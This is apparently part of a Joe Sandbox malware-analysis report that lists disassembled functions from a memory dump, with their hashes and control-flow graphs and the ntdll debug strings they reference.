                                                                          • Instruction ID: c3c5e48fa8e23b898cb32dcaf92d20e42c363d0f93d6000bd6cc97f0679053b2
                                                                          • Opcode Fuzzy Hash: f148ede0e5463eb6edfe922dc4616cc1137ebdaa4300e21df3ff2bea6fa7f542
                                                                          • Instruction Fuzzy Hash: A9E0D836641A60DFD73A9B18DD24F9677F2FF40BE0F05041DE8850F9A08764DD80CA84
                                                                          Function 35763C80 Relevance: .0, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                          • Instruction ID: 0ceb09b1a1c70473a7aac8b440528ddc3402dd409da857b1b1e7b2d88193656e
                                                                          • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                          • Instruction Fuzzy Hash: A9E0AEB83042059FD705CF19C054B6277A6BFD5B54F25C468A84A8F349E732A842CA80
                                                                          Function 35775660 Relevance: .0, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c20ecf225a0dee694208ea341b38e602cd64d75c44577403fba3f7e6e2ef15f7
                                                                          • Instruction ID: 6f9563e6e5ba00ec16e89d4028b2cf894070e5164f4ef03a0723f7812be9b042
                                                                          • Opcode Fuzzy Hash: c20ecf225a0dee694208ea341b38e602cd64d75c44577403fba3f7e6e2ef15f7
                                                                          • Instruction Fuzzy Hash: 5CE086322507449FD7218B05D804F52B7E5EB557B1F00C829E55987950C7B9F880CB94
                                                                          Function 356E1F70 Relevance: .0, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4600a68f6a6312af80bf87ba94ab7a2a3ac65af795abc861e63763c9bbec8acd
                                                                          • Instruction ID: f512d7b7cf56f590a8974c1702103f28858209f4486dcc4ca2b467b88164cb0e
                                                                          • Opcode Fuzzy Hash: 4600a68f6a6312af80bf87ba94ab7a2a3ac65af795abc861e63763c9bbec8acd
                                                                          • Instruction Fuzzy Hash: 8FE08C322024546BC221EB58DE20E4A73AEEB94260B000120B152976A0CB21ED02CB98
                                                                          Function 356F3C20 Relevance: .0, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 75fefd2921092572aac8655a2177b657d35f0d681cb629f59870e54ebf3e4547
                                                                          • Instruction ID: eb30ecfd8748a059ced0b6158fc94806398284a232e27f7f81432883d5098f8c
                                                                          • Opcode Fuzzy Hash: 75fefd2921092572aac8655a2177b657d35f0d681cb629f59870e54ebf3e4547
                                                                          • Instruction Fuzzy Hash: 8CE012B5B110009BCB569B14D650B5573A3BBC1655F514468E0429B564DB75C892EA40
                                                                          Function 356DB502 Relevance: .0, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                                                          • Instruction ID: 1d7b03ceb3d30ad283bc132471daea3211f7dad38711db80a6b45a4d6ff558a7
                                                                          • Opcode Fuzzy Hash: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                                                          • Instruction Fuzzy Hash: FAD05E32251610AAC7321F10ED05F92BBB5AF40B90F05092CB1011A8F486A1ED94CA99
                                                                          Function 35719CCF Relevance: .0, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5f827cf5a3b84b19de6cda159ac02ded87308e13fc42a45db8754c63cbcc60ca
                                                                          • Instruction ID: ac53bfa63576f05c8b90b4988d498107ac0cb8e144646185f83a010bee326432
                                                                          • Opcode Fuzzy Hash: 5f827cf5a3b84b19de6cda159ac02ded87308e13fc42a45db8754c63cbcc60ca
                                                                          • Instruction Fuzzy Hash: B2D05EB6D045009BDBA29F18D940F4A7BB6FBD0B64F610054A842BB260C739E812EB44
                                                                          Function 3571BD37 Relevance: .0, Instructions: 13COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 19401c6d88722fd4fba9d8820fe9254d08717b3e6b500efd65fb973b8bd432cc
                                                                          • Instruction ID: c99331d90a3c9bde0561cf777d74aeb35281a7adffda27f1373a1c5d4221ac00
                                                                          • Opcode Fuzzy Hash: 19401c6d88722fd4fba9d8820fe9254d08717b3e6b500efd65fb973b8bd432cc
                                                                          • Instruction Fuzzy Hash: 00E0E2362809C4CFD732CB04C948FA873A1F700B80F8504B0E0094BDB5CBBC9A84EA40
                                                                          Function 35763C57 Relevance: .0, Instructions: 11COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 03709d6d71206267f39e1a1d74387e03fee686b3819606185ebfbb9edac324f5
                                                                          • Instruction ID: a3dd90f8432a9a373b01b56a0c41317a62f20b41c2d50ff872e9835f1f793d34
                                                                          • Opcode Fuzzy Hash: 03709d6d71206267f39e1a1d74387e03fee686b3819606185ebfbb9edac324f5
                                                                          • Instruction Fuzzy Hash: 28C01232180248BBCB126E81CC00F057B2AEB94B60F008010BA080A5608632E9A0EA88
                                                                          Function 356DDC40 Relevance: .0, Instructions: 11COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 768b791705985fef6bbd48d24f8a2b4910ff65960d9034aae90c2b5012bdc449
                                                                          • Instruction ID: 9fc6192027fbba809b4ff969754ca2a0179825770b106faea3e5210f40a80276
                                                                          • Opcode Fuzzy Hash: 768b791705985fef6bbd48d24f8a2b4910ff65960d9034aae90c2b5012bdc449
                                                                          • Instruction Fuzzy Hash: 40C08C70381B409AEB221B20CD11B103AB4BB50B40F8104A06301D94F0EBB9DC00EA04
                                                                          Function 3570332D Relevance: .0, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                          • Instruction ID: bcb692920bec9fb6ff4ed9e8d1707055dd497e917154128a43e7249388ba2c02
                                                                          • Opcode Fuzzy Hash: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                          • Instruction Fuzzy Hash: 2EC08CB82412806AFB1A4B04CD60F2876E6BB00B85F80019CAA011E4A1C7AAE801CA08
                                                                          Function 356F5D60 Relevance: .0, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 87b40be69bb84b8935692bbbf804503f40e9112a4bb32ea9a7600e8e15bbdb5b
                                                                          • Instruction ID: d002240c2ae8d8111fed478b39a1d96264239f6da44d555814ab086646cabcd5
                                                                          • Opcode Fuzzy Hash: 87b40be69bb84b8935692bbbf804503f40e9112a4bb32ea9a7600e8e15bbdb5b
                                                                          • Instruction Fuzzy Hash: B6C08C32180248BBC7129A41DC10F057F29E7A0B60F000020B6040A5608532EC60D68C
                                                                          Function 356F3C40 Relevance: .0, Instructions: 7COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                          • Instruction ID: e3bd49f5d6fb30209fa13ba55575f7c006a637840b0543ca15c1c9911d590a15
                                                                          • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                          • Instruction Fuzzy Hash: 26B092383019408FDE06CF29C490F0573E4BB84A84B8500D0E400C7A10D329E800C900
                                                                          Function 356EFCC9 Relevance: .0, Instructions: 5COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5fd49143fa49102544c2963eb9d090727d6c92543d1f0f36e433bd1cea946303
                                                                          • Instruction ID: 42abccde3ca4e66caaebfb28e8a19ae5d093f3a970586898d25a06e18b273cb9
                                                                          • Opcode Fuzzy Hash: 5fd49143fa49102544c2963eb9d090727d6c92543d1f0f36e433bd1cea946303
                                                                          • Instruction Fuzzy Hash: F6B01232912440CFCF02DF40C700A1D7333FB40710F194450900017520C238EC03CB40
                                                                          Function 35724570 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0c57ff24fa4c086311998546dce6324c2d2a73001c85b01ffcc1473e47328cd8
                                                                          • Instruction ID: 45b795403c4987a96f5a128a5bec3b53c6a5b1db3d7103c9c9bb57f4e29c4f28
                                                                          • Opcode Fuzzy Hash: 0c57ff24fa4c086311998546dce6324c2d2a73001c85b01ffcc1473e47328cd8
                                                                          • Instruction Fuzzy Hash: A19002A161310042454071594905446601557F13117D1C65AA0544920DC6388859A2A9
                                                                          Function 35723C30 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cf5cabcadedca2bddc436791d79b4d420fa86cfdb1d2a5c90aaa8be308e0b1b4
                                                                          • Instruction ID: 99cc8de47c5f4a40ade7b49a6c90a3adfe208956ab5477fd3033b0c0f6c4a588
                                                                          • Opcode Fuzzy Hash: cf5cabcadedca2bddc436791d79b4d420fa86cfdb1d2a5c90aaa8be308e0b1b4
                                                                          • Instruction Fuzzy Hash: 6790027121300142994062595905A8E411547F1312FD1D95AA0005914DC93488656261
                                                                          Function 35723C90 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 499a0f13f561ee784a7efe9a902f3fd91fa7deaddb522eab4a77129ff6ace91e
                                                                          • Instruction ID: be2375ddef745d6393ccf75f7d8522d748c36689cba48f45f3e7a1b59fbcee80
                                                                          • Opcode Fuzzy Hash: 499a0f13f561ee784a7efe9a902f3fd91fa7deaddb522eab4a77129ff6ace91e
                                                                          • Instruction Fuzzy Hash: A690027521300402D91061595905686005647E0311F91D956A0414918EC67488A5B161
                                                                          Function 357238D0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8855b2964225d8a934a2634144fb5fad354cd3ab2edb7134da5dbea602e52a1b
                                                                          • Instruction ID: aee0b53434ad5ff2b28d23e8b4bffbb3a47a9ea586fd3360499f792bd7a69262
                                                                          • Opcode Fuzzy Hash: 8855b2964225d8a934a2634144fb5fad354cd3ab2edb7134da5dbea602e52a1b
                                                                          • Instruction Fuzzy Hash: BE90026125705102D550715D4505656401567F0211F91C566A0804954EC57588597261
                                                                          Function 35717550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1160 35717550-35717571 1161 35717573-3571758f call 356ee580 1160->1161 1162 357175ab-357175b9 call 35724b50 1160->1162 1167 35717595-357175a2 1161->1167 1168 35754443 1161->1168 1169 357175a4 1167->1169 1170 357175ba-357175c9 call 35717738 1167->1170 1172 3575444a-35754450 1168->1172 1169->1162 1176 35717621-3571762a 1170->1176 1177 357175cb-357175e1 call 357176ed 1170->1177 1174 35754456-357544c3 call 3576ef10 call 35728f40 RtlDebugPrintTimes BaseQueryModuleData 1172->1174 1175 357175e7-357175f0 call 35717648 1172->1175 1174->1175 1194 357544c9-357544d1 1174->1194 1175->1176 1185 357175f2 1175->1185 1180 357175f8-35717601 1176->1180 1177->1172 1177->1175 1187 35717603-35717612 call 3571763b 1180->1187 1188 3571762c-3571762e 1180->1188 1185->1180 1189 35717614-35717616 1187->1189 1188->1189 1192 35717630-35717639 1189->1192 1193 35717618-3571761a 1189->1193 1192->1193 1193->1169 1196 3571761c 1193->1196 1194->1175 1197 357544d7-357544de 1194->1197 1198 357545c9-357545db call 35722b70 1196->1198 1197->1175 1199 357544e4-357544ef 1197->1199 1198->1169 1200 357544f5-3575452e call 3576ef10 call 3572a9c0 1199->1200 1201 357545c4 call 35724c68 1199->1201 1209 35754546-35754576 call 3576ef10 1200->1209 1210 35754530-35754541 call 3576ef10 1200->1210 1201->1198 1209->1175 1215 3575457c-3575458a call 3572a690 1209->1215 1210->1176 1218 35754591-357545ae call 3576ef10 call 3575cc1e 1215->1218 1219 3575458c-3575458e 1215->1219 1218->1175 1224 357545b4-357545bd 1218->1224 1219->1218 1224->1215 1225 357545bf 1224->1225 1225->1175
                                                                          Strings
                                                                          • Execute=1, xrefs: 3575451E
                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 35754592
                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 35754530
                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3575454D
                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 35754460
                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 35754507
                                                                          • ExecuteOptions, xrefs: 357544AB
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                          • API String ID: 0-484625025
                                                                          • Opcode ID: e8817cfd5dbf74acf19b512a0d137c62fcad18399086439f5ea2ed6f9c5e2937
                                                                          • Instruction ID: 7276a93c673670fcaf33de203a9501549720c2fea96122c36011fe5bfd73fedc
                                                                          • Opcode Fuzzy Hash: e8817cfd5dbf74acf19b512a0d137c62fcad18399086439f5ea2ed6f9c5e2937
                                                                          • Instruction Fuzzy Hash: D551D471A04219AAEB11DFA5DC89FEE73B9FF08354F4004E9D905AF181EB709B45CEA0
                                                                          Function 356FD690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1372 356fd690-356fd6cb 1373 356fd907-356fd90e 1372->1373 1374 356fd6d1-356fd6db 1372->1374 1373->1374 1375 356fd914-35749139 1373->1375 1376 35749164 1374->1376 1377 356fd6e1-356fd6ea 1374->1377 1375->1374 1383 3574913f-35749144 1375->1383 1380 3574916e-3574917d 1376->1380 1377->1376 1379 356fd6f0-356fd6f3 1377->1379 1381 356fd8fa-356fd8fc 1379->1381 1382 356fd6f9-356fd6fb 1379->1382 1386 35749158-35749161 call 3576ef10 1380->1386 1384 356fd902 1381->1384 1385 356fd701-356fd704 1381->1385 1382->1376 1382->1385 1387 356fd847-356fd858 call 35724b50 1383->1387 1389 356fd70a-356fd70d 1384->1389 1385->1376 1385->1389 1386->1376 1393 356fd919-356fd922 1389->1393 1394 356fd713-356fd716 1389->1394 1393->1394 1397 356fd928-35749153 1393->1397 1395 356fd92d-356fd936 1394->1395 1396 356fd71c-356fd768 call 356fd580 1394->1396 1395->1396 1400 356fd93c 1395->1400 1396->1387 1402 356fd76e-356fd772 1396->1402 1397->1386 1400->1380 1402->1387 1403 356fd778-356fd77f 1402->1403 1404 356fd785-356fd789 1403->1404 1405 356fd8f1-356fd8f5 1403->1405 1407 356fd790-356fd79a 1404->1407 1406 35749370-35749388 call 3576ef10 1405->1406 1406->1387 1407->1406 1408 356fd7a0-356fd7a7 1407->1408 1410 356fd80d-356fd82d 1408->1410 1411 356fd7a9-356fd7ad 1408->1411 1413 356fd830-356fd833 1410->1413 1414 3574917f 1411->1414 1415 356fd7b3-356fd7b8 1411->1415 1416 356fd85b-356fd860 1413->1416 1417 356fd835-356fd838 1413->1417 1419 35749186-35749188 1414->1419 1418 356fd7be-356fd7c5 1415->1418 1415->1419 1422 357492e0-357492e8 1416->1422 1423 356fd866-356fd869 1416->1423 1420 356fd83e-356fd840 1417->1420 1421 35749366-3574936b 1417->1421 1425 357491f7-357491fa 1418->1425 1426 356fd7cb-356fd803 call 35728170 1418->1426 1419->1418 1424 3574918e-357491b7 1419->1424 1428 356fd842 1420->1428 1429 356fd891-356fd8ac call 356fa600 1420->1429 1421->1387 1430 357492ee-357492f2 1422->1430 1431 356fd941-356fd94f 1422->1431 1423->1431 1432 356fd86f-356fd872 1423->1432 1424->1410 1433 357491bd-357491d7 call 35738050 1424->1433 1427 357491fe-3574920d call 35738050 1425->1427 1448 356fd805-356fd807 1426->1448 1450 35749224 1427->1450 1451 3574920f-3574921d 1427->1451 1428->1387 1455 35749335-3574933a 1429->1455 1456 356fd8b2-356fd8da 1429->1456 1430->1431 1436 357492f8-35749301 1430->1436 1437 356fd874-356fd884 1431->1437 1439 356fd955-356fd95e 1431->1439 1432->1417 1432->1437 1433->1448 1454 357491dd-357491f0 1433->1454 1443 35749303-35749306 1436->1443 1444 3574931f-35749321 1436->1444 1437->1417 1445 356fd886-356fd88f 1437->1445 1439->1420 1452 35749310-35749313 1443->1452 1453 35749308-3574930e 1443->1453 1444->1431 1449 35749327-35749330 1444->1449 1445->1420 1448->1410 1457 3574922d-35749231 1448->1457 1449->1420 1450->1457 1451->1427 1460 3574921f 1451->1460 1462 35749315-3574931a 1452->1462 1463 3574931c 1452->1463 1453->1444 1454->1433 1464 357491f2 1454->1464 1458 356fd8dc-356fd8de 1455->1458 1459 35749340-35749343 1455->1459 1456->1458 1457->1410 1461 35749237-3574923d 1457->1461 1465 35749356-3574935b 1458->1465 1466 356fd8e4-356fd8eb 1458->1466 1459->1458 1467 35749349-35749351 1459->1467 1460->1410 1468 35749264-3574926d 1461->1468 1469 3574923f-3574925c 1461->1469 1462->1449 1463->1444 1464->1410 1465->1387 1470 35749361 1465->1470 1466->1405 1466->1407 1467->1413 1472 357492b4-357492b6 1468->1472 1473 3574926f-35749274 1468->1473 1469->1468 1471 3574925e-35749261 1469->1471 1470->1421 1471->1468 1474 357492b8-357492d3 call 356e4428 1472->1474 1475 357492d9-357492db 1472->1475 1473->1472 1476 35749276-3574927a 1473->1476 1474->1387 1474->1475 1475->1387 1478 35749282-357492ae RtlDebugPrintTimes 1476->1478 1479 3574927c-35749280 1476->1479 1478->1472 1482 357492b0 1478->1482 1479->1472 1479->1478 1482->1472
                                                                          APIs
                                                                          Strings
                                                                          • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 35749372
                                                                          • GsHd, xrefs: 356FD794
                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35749178
                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35749153
                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 3574914E, 35749173
                                                                          • Actx , xrefs: 35749315
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
